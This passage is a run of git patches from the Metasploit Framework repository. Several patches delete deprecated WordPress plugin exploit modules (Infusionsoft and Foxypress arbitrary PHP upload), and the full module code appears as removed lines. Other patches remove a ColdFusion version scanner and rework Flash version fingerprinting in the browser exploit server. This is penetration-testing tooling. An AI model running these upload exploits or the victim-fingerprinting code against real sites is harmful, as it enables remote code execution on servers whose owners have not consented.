-  deprecated(Date.new(2015, 5, 23), 'exploit/unix/webapp/wp_infusionsoft_upload')
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
-      'Description'    => %q{
-        This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity
-        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
-        upload and remote code execution.
-      },
-      'Author'         =>
-        [
-          'g0blin',                    # Vulnerability Discovery
-          'us3r777 <us3r777@n0b0.so>'  # Metasploit module
-        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          ['CVE', '2014-6446'],
-          ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
-          ['WPVDB', '7634']
-        ],
-      'Privileged'     => false,
-      'Platform'       => 'php',
-      'Arch'           => ARCH_PHP,
-      'Targets'        => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
-      'DisclosureDate' => 'Sep 25 2014',
-      'DefaultTarget'  => 0)
-    )
-  end
-
-  def check
-    res = send_request_cgi(
-      'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
-    )
-
-    if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
-      return Exploit::CheckCode::Detected
-    end
-
-    Exploit::CheckCode::Safe
-  end
-
-  def exploit
-    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
-    res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
-                     'Infusionsoft', 'utilities', 'code_generator.php'),
-      'method'    => 'POST',
-      'vars_post' =>
-      {
-        'fileNamePattern' => php_pagename,
-        'fileTemplate'    => payload.encoded
-      }
-    })
-
-    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
-      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
-      register_files_for_cleanup(php_pagename)
-    else
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
-    end
-
-    print_status("#{peer} - Calling payload ...")
-    send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
-                     'Infusionsoft', 'utilities', php_pagename)
-    }, 2)
-  end
-
-end

From 4960e64597f88b6a154d35c8243c8597e6bbe684 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 13 Jul 2015 12:53:34 -0500
Subject: [PATCH 0755/1013] Remove php_wordpress_foxypress, use
 wp_foxypress_upload

Please use exploit/unix/webapp/wp_foxypress_upload instead.
---
 .../unix/webapp/php_wordpress_foxypress.rb    | 88 -------------------
 1 file changed, 88 deletions(-)
 delete mode 100644 modules/exploits/unix/webapp/php_wordpress_foxypress.rb

diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
deleted file mode 100644
index 3970b9654f..0000000000
--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ /dev/null
@@ -1,88 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
-
-  include Msf::HTTP::Wordpress
-  include Msf::Exploit::FileDropper
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2015, 5, 23), 'exploit/unix/webapp/wp_foxypress_upload')
-
-  def initialize(info = {})
-    super(update_info(
-      info,
-      'Name'           => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',
-      'Description'    => %q(
-          This module exploits an arbitrary PHP code execution flaw in the WordPress
-        blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
-        file upload and remote code execution via the uploadify.php script. The Foxypress
-        plug-in versions 0.4.1.1 to 0.4.2.1 are vulnerable.
-      ),
-      'Author'         =>
-        [
-          'Sammy FORGIT', # Vulnerability Discovery, PoC
-          'patrick' # Metasploit module
-        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          ['EDB', '18991'],
-          ['OSVDB' '82652'],
-          ['BID', '53805'],
-          ['WPVDB', '6231']
-        ],
-      'Privileged'     => false,
-      'Platform'       => 'php',
-      'Arch'           => ARCH_PHP,
-      'Targets'        => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]],
-      'DisclosureDate' => 'Jun 05 2012',
-      'DefaultTarget' => 0))
-  end
-
-  def check
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')
-    )
-
-    return Exploit::CheckCode::Detected if res && res.code == 200
-
-    Exploit::CheckCode::Safe
-  end
-
-  def exploit
-    post_data = Rex::MIME::Message.new
-    post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
-
-    print_status("#{peer} - Sending PHP payload")
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),
-      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
-      'data'   => post_data.to_s
-    )
-
-    if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
-      print_error("#{peer} - File wasn't uploaded, aborting!")
-      return
-    end
-
-    filename = "#{Regexp.last_match[1]}.php"
-
-    print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")
-    register_files_for_cleanup(filename)
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri'    => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)
-    )
-
-    print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200
-  end
-end

From e4e9ac9d28ce9a43c766487676ce8841dc4d1545 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 13 Jul 2015 12:56:46 -0500
Subject: [PATCH 0756/1013] Remove cold_fusion_version, use coldfusion_version
 instead

Please use auxiliary/scanner/http/coldfusion_version instead.
---
 .../scanner/http/cold_fusion_version.rb       | 130 ------------------
 1 file changed, 130 deletions(-)
 delete mode 100644 modules/auxiliary/scanner/http/cold_fusion_version.rb

diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb
deleted file mode 100644
index ef320c9026..0000000000
--- a/modules/auxiliary/scanner/http/cold_fusion_version.rb
+++ /dev/null
@@ -1,130 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::Scanner
-  include Msf::Auxiliary::Report
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2015, 6, 28), 'auxiliary/scanner/http/coldfusion_version')
-
-  def initialize
-    super(
-      'Name'        => 'ColdFusion Version Scanner',
-      'Description' => %q{
-        This module attempts identify various flavors of ColdFusion up to version 10
-        as well as the underlying OS.
-      },
-      'Author'      =>
-        [
-          'nebulus',  # Original
-          'sinn3r'    # Fingerprint() patch for Cold Fusion 10
-        ],
-      'License'     => MSF_LICENSE
-    )
-  end
-
-  def fingerprint(response)
-
-    if(response.headers.has_key?('Server') )
-      if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
-        os = "Windows (#{response.headers['Server']})"
-      elsif(response.headers['Server'] =~ /Apache\//)
-        os = "Unix (#{response.headers['Server']})"
-      else
-        os = response.headers['Server']
-      end
-    end
-
-    return nil if response.body.length < 100
-
-    title = "Not Found"
-    if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/im)
-      title = $1
-      title.gsub!(/\s/, '')
-    end
-
-    return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
-
-    out = nil
-
-    if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
-      v = $1
-      out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995\-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ )
-      out = "Adobe ColdFusion MX7"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2006 Adobe/)
-      out = "Adobe ColdFusion 8"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
-      response.body =~ /1997\-2012 Adobe Systems Incorporated and its licensors/)
-      out = "Adobe ColdFusion 10"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ or
-      response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/ or
-      response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1997\-2012 Adobe Systems\, Inc\. All rights reserved/)
-      out = "Adobe ColdFusion 9"
-    elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
-      out = $1.split(/,/)[0]
-    else
-      out = 'Unknown ColdFusion'
-    end
-
-    if(title.downcase == 'coldfusionadministrator')
-      out << " (administrator access)"
-    end
-
-    out << " (#{os})"
-    return out
-  end
-
-  def run_host(ip)
-
-    url = '/CFIDE/administrator/index.cfm'
-
-    res = send_request_cgi({
-      'uri' => url,
-      'method' => 'GET',
-    })
-
-    return if not res or not res.body or not res.code
-    res.body.gsub!(/[\r|\n]/, ' ')
-
-    if (res.code.to_i == 200)
-      out = fingerprint(res)
-      return if not out
-      if(out =~ /^Unknown/)
-        print_status("#{ip} " << out)
-        return
-      else
-        print_good("#{ip}: " << out)
-        report_note(
-          :host  => ip,
-          :port  => datastore['RPORT'],
-          :proto => 'tcp',
-          :ntype => 'cfversion',
-          :data  => out
-        )
-      end
-    elsif(res.code.to_i == 403 and datastore['VERBOSE'])
-      if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
-        print_status("#{ip} denied access to #{url} (SSL Required)")
-      elsif(res.body =~ /has a list of IP addresses that are not allowed/)
-        print_status("#{ip} restricted access by IP")
-      elsif(res.body =~ /SSL client certificate is required/)
-        print_status("#{ip} requires a SSL client certificate")
-      else
-        print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
-      end
-    end
-
-  rescue OpenSSL::SSL::SSLError
-  rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
-  rescue ::Timeout::Error, ::Errno::EPIPE
-  end
-
-end

From 493a6407865fb9191bd72eed62e0bd0eff5987fd Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 13 Jul 2015 13:44:12 -0500
Subject: [PATCH 0757/1013] remove bundled-with tag

---
 Gemfile.lock | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 3e5d929d53..20788623a7 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -247,6 +247,3 @@ DEPENDENCIES
   simplecov
   timecop
   yard
-
-BUNDLED WITH
-   1.10.3

From 9116460cb06cb81f8c7a430637f79980b1150f5c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 13 Jul 2015 16:33:55 -0500
Subject: [PATCH 0758/1013] Add prototype with AS3

---
 data/flash_detector/detector.swf              | Bin 0 -> 801 bytes
 external/source/flash_detector/Detector.as    |  36 ++++++
 .../exploit/remote/browser_exploit_server.rb  | 110 +++++++++++++-----
 3 files changed, 117 insertions(+), 29 deletions(-)
 create mode 100644 data/flash_detector/detector.swf
 create mode 100755 external/source/flash_detector/Detector.as

diff --git a/data/flash_detector/detector.swf b/data/flash_detector/detector.swf
new file mode 100644
index 0000000000000000000000000000000000000000..e7a48d93691d0907316c7141d864790570b99d71
GIT binary patch
literal 801
zcmV++1K#{vS5qC`1ONaK0{{SB001BW06YKujv4yj=Vl0?JwAo?b#KsqVKo~Xixy4a
z1v37mOh!q!duw(1D_l1z3z0VgHxB9Y;ryOt+H4UaGwq-bc5tB0m@amJ@Zeci1_<fO
z>!QZnT84W^-kDu!b~qNjlRVSVp3_xhTH3JNC+2)1J*>=-p>|kv2*_BK)@TdzxW~s5
zRX~U5S-?);A+G44YL3M0*f=<)^i{biPBGOIR$l<Z>YO&{zPAusrYQ+MNi=aD#T4!$
zPkS*y<NE;B@xS6PzC>6Mr~&jb2>K)qny&rD&(ESY3$E?lK{?1zUms&{I3Vb0<VS_*
zF1j}Q^8?U=u{T<{ehV~&A$V*KJnI^`%Kh0}0?H#*zs>PAfZnw)6Q3%5yC1XyKaFMW
zh();^#l%$yYUu1F6xNLje$A1ok9CORez%6DkmYl83$w83pe+7>tTq6gI*Z<$H1=`b
zuAKe}IlLQ<S8o~m_Fg^&Q-VScLb8hzkv#ZuU3d!%5LVOXiT-lyBGF+YBc$|qCo+#;
zUEAX*FyO-MdtWgzHzKLP*yA5!9tI(cMYsNRCJQ9|?0=Z3R{T2<t7@XzeC3~&<6-})
zFB+}F3|%({se3M9=I#OC5Qdpk8*}$>z*K{>h}f%=FRX71&F=|ENB4n{I3MQS;6FB;
z%w2iKvPqvxFbM5*%MOZ9@|W~$RwJ}aOUKSO<xv1~IO#bnV#30~vj&fQ5+Fn(vZM=-
z8KqA6k?jeD*M93r7#uSNXRJ=MYM|C$=%Wd^SxLq*gj#dN#!|0ug{UrNk*+ehX0rvP
zpQ_7?krROD4ZImF#pYMSaHk>iSLaT<vm~_kkN#U!h~h?&B#3?R%e4H(^eJy-k#ccn
zPL#3(malZs1#iRb(=?xOiOCHk;evL0BQszQBdaA|W5f6f@Fn;u&2#LsX~0VmZHcwT
z)hRG^aPlwv33$`FaY30}Ky9&fmjB9lYWYXl3TW*1kJdKcHxN77*d`GcbGtx74G_wW
fR%9(~StVC8dl-w$UO~H-tSNtxQXYVx{vnQkW;cXF

literal 0
HcmV?d00001

diff --git a/external/source/flash_detector/Detector.as b/external/source/flash_detector/Detector.as
new file mode 100755
index 0000000000..664ed66dd6
--- /dev/null
+++ b/external/source/flash_detector/Detector.as
@@ -0,0 +1,36 @@
+/* 
+Code to do flash version detection from ActionScript
+
+* How to build:
+    1. Use Flex SDK 4.6 / AIRSDK 18 
+    2. Build with: mxmlc -o msf.swf Exploit.as
+*/
+
+package
+{
+    import flash.display.Sprite
+    import flash.external.ExternalInterface
+    import flash.system.Capabilities
+
+    public class Detector extends Sprite
+	{
+                
+        public function Detector()
+        {
+            var version:String = getVersion()
+            ExternalInterface.call("setFlashVersion", version)
+        }
+        
+        private function getVersion():String
+        {
+            try {
+                var version:String = flash.system.Capabilities.version
+                version = version.split(/ /)[1]
+                version = version.replace(/,/g, ".")
+                return version
+            } catch (err:Error) {
+                return ""
+            }
+        }
+    }
+}
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index a8c02ae479..a2e881795f 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -90,8 +90,7 @@ module Msf
       @info_receiver_page     = rand_text_alpha(5)
       @exploit_receiver_page  = rand_text_alpha(6)
       @noscript_receiver_page = rand_text_alpha(7)
-      @flash_receiver_page    = rand_text_alpha(8)
-      @flash_swf              = rand_text_alpha(9)
+      @flash_swf              = "#{rand_text_alpha(9)}.swf"
 
       register_options(
       [
@@ -333,11 +332,6 @@ module Msf
 
       # Gathering target info from the detection stage
       case source
-      when :flash
-        # Flash version detection
-        parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
-        version_info = 'FLASH VERSION HERE'
-        update_profile(target_info, :flash, version_info)
       when :script
         # Gathers target data from a POST request
         parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
@@ -394,6 +388,9 @@ module Msf
       <%= js_misc_addons_detect %>
       <%= js_ie_addons_detect if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
 
+      var flash_version = "";
+      var do_flash_loop = true;
+
       function objToQuery(obj) {
         var q = [];
         for (var key in obj) {
@@ -402,6 +399,52 @@ module Msf
         return Base64.encode(q.join('&'));
       }
 
+      function isEmpty(str) {
+        return (!str \|\| 0 === str.length);
+      }
+
+      function sendInfo(info) {
+        var query = objToQuery(info);
+        postInfo("<%=get_resource.chomp("/")%>/<%=@info_receiver_page%>/", query, function(){
+          window.location="<%= get_module_resource %>";
+        });
+      }
+
+      function setFlashVersion(ver) {
+        console.log('called! :) ' + ver)
+        flash_version = ver
+        do_flash_loop = false
+        console.log('flash version after set_version: ' + flash_version)
+        return;
+      }
+
+      function createFlashObject(src, attributes, parameters) {
+        var i, html, div, obj, attr = attributes \|\| {}, param = parameters \|\| {};
+        attr.type = 'application/x-shockwave-flash';
+        if (window.ActiveXObject) {
+          attr.classid = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000';
+          param.movie = src;
+        } else {
+          attr.data = src;
+        }
+
+        html = '<object';
+        for (i in attr) {
+          html += ' ' + i + '="' + attr[i] + '"';
+        }
+        html += '>';
+        for (i in param) {
+          html += '<param name="' + i + '" value="' + param[i] + '" />';
+        }
+        html += '</object>';
+        div = document.createElement('div');
+        div.innerHTML = html;
+        obj = div.firstChild;
+        div.removeChild(obj);
+        console.log(obj)
+        alert('check obj')
+        return obj;
+      }
 
       window.onload = function() {
         var osInfo = os_detect.getVersion();
@@ -418,15 +461,6 @@ module Msf
           "vuln_test"   : <%= js_vuln_test %>
         };
 
-        if (d["flash"])  {
-          // Load SWF for accurate Flash detection
-          // This SWF needs to send the Flash version info as a POST request to BES sort of like this:
-          // <%=get_resource.chomp("/")%>/<%=@info_receiver_page%>/
-          var flashObject = document.createElement("object");
-          flashObject.setAttribute("data", "Flash location from the @flash_swf instance variable");
-          document.body.appendChild(flashObject); // Do you actually need to do this?
-        }
-
         <% if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
           d['office'] = ie_addons_detect.getMsOfficeVersion();
           d['mshtml_build'] = ScriptEngineBuildVersion().toString();
@@ -448,10 +482,30 @@ module Msf
           <% end %>
         <% end %>
 
-        var query = objToQuery(d);
-        postInfo("<%=get_resource.chomp("/")%>/<%=@info_receiver_page%>/", query, function(){
-          window.location="<%= get_module_resource %>";
-        });
+        if (d["flash"] != null && (d["flash"].match(/[\\d]+.[\\d]+.[\\d]+.[\\d]+/)) == null) {
+          alert('flash detection!')
+          // Load SWF for accurate Flash detection
+          // This SWF needs to send the Flash version info as a POST request to BES sort of like this:
+          var flashObject = createFlashObject('<%=get_resource.chomp("/")%>/<%=@flash_swf%>', {width: 1, height: 1}, {allowScriptAccess: 'always', Play: 'True'});
+
+          (function loop(){
+            console.log('loop: ' + flash_version)
+            setTimeout(function(){
+              if (do_flash_loop) {
+                loop()
+              }
+              console.log('finally: ' + flash_version)
+              if (!isEmpty(flash_version)) {
+                d["flash"] = flash_version
+              }
+              sendInfo(d)
+            }, 1000);
+          })();
+
+          document.body.appendChild(flashObject)
+        } else {
+          sendInfo(d)
+        }
       }
       |).result(binding())
 
@@ -485,8 +539,10 @@ module Msf
     end
 
     def load_swf_detection
-      # Your SWF loads here
-      ''
+      path = ::File.join(Msf::Config.data_directory, 'flash_detector', 'detector.swf')
+      swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+      swf
     end
 
 
@@ -514,14 +570,10 @@ module Msf
         send_response(cli, html, {'Set-Cookie' => cookie_header(tag)})
 
       when /#{@flash_swf}/
+        vprint_status("Sending SWF used for Flash detection")
         swf = load_swf_detection
-        send_response(cli, swf)
-
-      when /#{@flash_receiver_page}/
-        vprint_status("Received information from Flash")
-        process_browser_info(:flash, cli, request)
-        send_not_found(cli)
-
+        send_response(cli, swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+        
       when /#{@info_receiver_page}/
         #
         # The detection code will hit this if Javascript is enabled

From 244d9bae64cb53446fd7c157de9e4a17da0d73f3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 13 Jul 2015 16:52:25 -0500
Subject: [PATCH 0759/1013] Add max timeout

---
 .../exploit/remote/browser_exploit_server.rb  | 39 +++++++++++--------
 1 file changed, 23 insertions(+), 16 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index a2e881795f..b10a009b96 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -388,9 +388,6 @@ module Msf
       <%= js_misc_addons_detect %>
       <%= js_ie_addons_detect if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
 
-      var flash_version = "";
-      var do_flash_loop = true;
-
       function objToQuery(obj) {
         var q = [];
         for (var key in obj) {
@@ -410,11 +407,19 @@ module Msf
         });
       }
 
+      var flashVersion = "";
+      var doFlashLoop = true;
+      var maxTimeout = null;
+
       function setFlashVersion(ver) {
         console.log('called! :) ' + ver)
-        flash_version = ver
-        do_flash_loop = false
-        console.log('flash version after set_version: ' + flash_version)
+        flashVersion = ver
+        doFlashLoop = false
+        if (maxTimeout != null) {
+          clearTimeout(maxTimeout);
+          maxTimeout = null
+        }
+        console.log('flash version after set_version: ' + flashVersion)
         return;
       }
 
@@ -483,23 +488,25 @@ module Msf
         <% end %>
 
         if (d["flash"] != null && (d["flash"].match(/[\\d]+.[\\d]+.[\\d]+.[\\d]+/)) == null) {
-          alert('flash detection!')
-          // Load SWF for accurate Flash detection
-          // This SWF needs to send the Flash version info as a POST request to BES sort of like this:
+          alert('flash detection!');
           var flashObject = createFlashObject('<%=get_resource.chomp("/")%>/<%=@flash_swf%>', {width: 1, height: 1}, {allowScriptAccess: 'always', Play: 'True'});
 
+          // After 5s stop waiting and use the version retrieved with JS
+          maxTimeout = setTimeout(function(){ doFlashLoop = false }, 5000);
+
+          // Check every 100 ms
           (function loop(){
-            console.log('loop: ' + flash_version)
+            console.log('loop: ' + flashVersion)
             setTimeout(function(){
-              if (do_flash_loop) {
+              if (doFlashLoop) {
                 loop()
               }
-              console.log('finally: ' + flash_version)
-              if (!isEmpty(flash_version)) {
-                d["flash"] = flash_version
+              console.log('finally: ' + flashVersion)
+              if (!isEmpty(flashVersion)) {
+                d["flash"] = flashVersion
               }
               sendInfo(d)
-            }, 1000);
+            }, 100);
           })();
 
           document.body.appendChild(flashObject)
@@ -573,7 +580,7 @@ module Msf
         vprint_status("Sending SWF used for Flash detection")
         swf = load_swf_detection
         send_response(cli, swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
-        
+
       when /#{@info_receiver_page}/
         #
         # The detection code will hit this if Javascript is enabled

From 8928c5529cab5dd588232df7f4ab0507bd65f565 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 13 Jul 2015 17:43:04 -0500
Subject: [PATCH 0760/1013] Fix Javascript code

---
 .../exploit/remote/browser_exploit_server.rb  | 41 ++++++++++---------
 1 file changed, 21 insertions(+), 20 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index b10a009b96..38cdcc9151 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -408,18 +408,17 @@ module Msf
       }
 
       var flashVersion = "";
-      var doFlashLoop = true;
+      var doInterval = true;
       var maxTimeout = null;
+      var intervalTimeout = null;
 
       function setFlashVersion(ver) {
-        console.log('called! :) ' + ver)
         flashVersion = ver
-        doFlashLoop = false
         if (maxTimeout != null) {
           clearTimeout(maxTimeout);
           maxTimeout = null
         }
-        console.log('flash version after set_version: ' + flashVersion)
+        doInterval = false
         return;
       }
 
@@ -446,8 +445,6 @@ module Msf
         div.innerHTML = html;
         obj = div.firstChild;
         div.removeChild(obj);
-        console.log(obj)
-        alert('check obj')
         return obj;
       }
 
@@ -488,26 +485,30 @@ module Msf
         <% end %>
 
         if (d["flash"] != null && (d["flash"].match(/[\\d]+.[\\d]+.[\\d]+.[\\d]+/)) == null) {
-          alert('flash detection!');
           var flashObject = createFlashObject('<%=get_resource.chomp("/")%>/<%=@flash_swf%>', {width: 1, height: 1}, {allowScriptAccess: 'always', Play: 'True'});
 
-          // After 5s stop waiting and use the version retrieved with JS
-          maxTimeout = setTimeout(function(){ doFlashLoop = false }, 5000);
+          // After 5s stop waiting and use the version retrieved with JS if there isn't anything
+          maxTimeout = setTimeout(function() {
+            if (intervalTimeout != null) {
+              doInterval = false
+              clearInterval(intervalTimeout)
+            }
+            if (!isEmpty(flashVersion)) {
+              d["flash"] = flashVersion
+            }
+            sendInfo(d);
+          }, 5000);
 
-          // Check every 100 ms
-          (function loop(){
-            console.log('loop: ' + flashVersion)
-            setTimeout(function(){
-              if (doFlashLoop) {
-                loop()
-              }
-              console.log('finally: ' + flashVersion)
+          // Check if there is a new flash version every 100ms
+          intervalTimeout = setInterval(function() {
+            if (!doInterval) {
+              clearInterval(intervalTimeout);
               if (!isEmpty(flashVersion)) {
                 d["flash"] = flashVersion
               }
-              sendInfo(d)
-            }, 100);
-          })();
+              sendInfo(d);
+            }
+          }, 100);
 
           document.body.appendChild(flashObject)
         } else {

From 8fb6bedd947c194468ce4ffebbac6b075caec663 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 13 Jul 2015 18:23:39 -0500
Subject: [PATCH 0761/1013] Delete as3 detecotr

---
 data/flash_detector/detector.swf              | Bin 801 -> 0 bytes
 external/source/flash_detector/Detector.as    |  36 ------------------
 .../exploit/remote/browser_exploit_server.rb  |   2 +-
 3 files changed, 1 insertion(+), 37 deletions(-)
 delete mode 100644 data/flash_detector/detector.swf
 delete mode 100755 external/source/flash_detector/Detector.as

diff --git a/data/flash_detector/detector.swf b/data/flash_detector/detector.swf
deleted file mode 100644
index e7a48d93691d0907316c7141d864790570b99d71..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 801
zcmV++1K#{vS5qC`1ONaK0{{SB001BW06YKujv4yj=Vl0?JwAo?b#KsqVKo~Xixy4a
z1v37mOh!q!duw(1D_l1z3z0VgHxB9Y;ryOt+H4UaGwq-bc5tB0m@amJ@Zeci1_<fO
z>!QZnT84W^-kDu!b~qNjlRVSVp3_xhTH3JNC+2)1J*>=-p>|kv2*_BK)@TdzxW~s5
zRX~U5S-?);A+G44YL3M0*f=<)^i{biPBGOIR$l<Z>YO&{zPAusrYQ+MNi=aD#T4!$
zPkS*y<NE;B@xS6PzC>6Mr~&jb2>K)qny&rD&(ESY3$E?lK{?1zUms&{I3Vb0<VS_*
zF1j}Q^8?U=u{T<{ehV~&A$V*KJnI^`%Kh0}0?H#*zs>PAfZnw)6Q3%5yC1XyKaFMW
zh();^#l%$yYUu1F6xNLje$A1ok9CORez%6DkmYl83$w83pe+7>tTq6gI*Z<$H1=`b
zuAKe}IlLQ<S8o~m_Fg^&Q-VScLb8hzkv#ZuU3d!%5LVOXiT-lyBGF+YBc$|qCo+#;
zUEAX*FyO-MdtWgzHzKLP*yA5!9tI(cMYsNRCJQ9|?0=Z3R{T2<t7@XzeC3~&<6-})
zFB+}F3|%({se3M9=I#OC5Qdpk8*}$>z*K{>h}f%=FRX71&F=|ENB4n{I3MQS;6FB;
z%w2iKvPqvxFbM5*%MOZ9@|W~$RwJ}aOUKSO<xv1~IO#bnV#30~vj&fQ5+Fn(vZM=-
z8KqA6k?jeD*M93r7#uSNXRJ=MYM|C$=%Wd^SxLq*gj#dN#!|0ug{UrNk*+ehX0rvP
zpQ_7?krROD4ZImF#pYMSaHk>iSLaT<vm~_kkN#U!h~h?&B#3?R%e4H(^eJy-k#ccn
zPL#3(malZs1#iRb(=?xOiOCHk;evL0BQszQBdaA|W5f6f@Fn;u&2#LsX~0VmZHcwT
z)hRG^aPlwv33$`FaY30}Ky9&fmjB9lYWYXl3TW*1kJdKcHxN77*d`GcbGtx74G_wW
fR%9(~StVC8dl-w$UO~H-tSNtxQXYVx{vnQkW;cXF

diff --git a/external/source/flash_detector/Detector.as b/external/source/flash_detector/Detector.as
deleted file mode 100755
index 664ed66dd6..0000000000
--- a/external/source/flash_detector/Detector.as
+++ /dev/null
@@ -1,36 +0,0 @@
-/* 
-Code to do flash version detection from ActionScript
-
-* How to build:
-    1. Use Flex SDK 4.6 / AIRSDK 18 
-    2. Build with: mxmlc -o msf.swf Exploit.as
-*/
-
-package
-{
-    import flash.display.Sprite
-    import flash.external.ExternalInterface
-    import flash.system.Capabilities
-
-    public class Detector extends Sprite
-	{
-                
-        public function Detector()
-        {
-            var version:String = getVersion()
-            ExternalInterface.call("setFlashVersion", version)
-        }
-        
-        private function getVersion():String
-        {
-            try {
-                var version:String = flash.system.Capabilities.version
-                version = version.split(/ /)[1]
-                version = version.replace(/,/g, ".")
-                return version
-            } catch (err:Error) {
-                return ""
-            }
-        }
-    }
-}
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 38cdcc9151..b2773491a0 100644
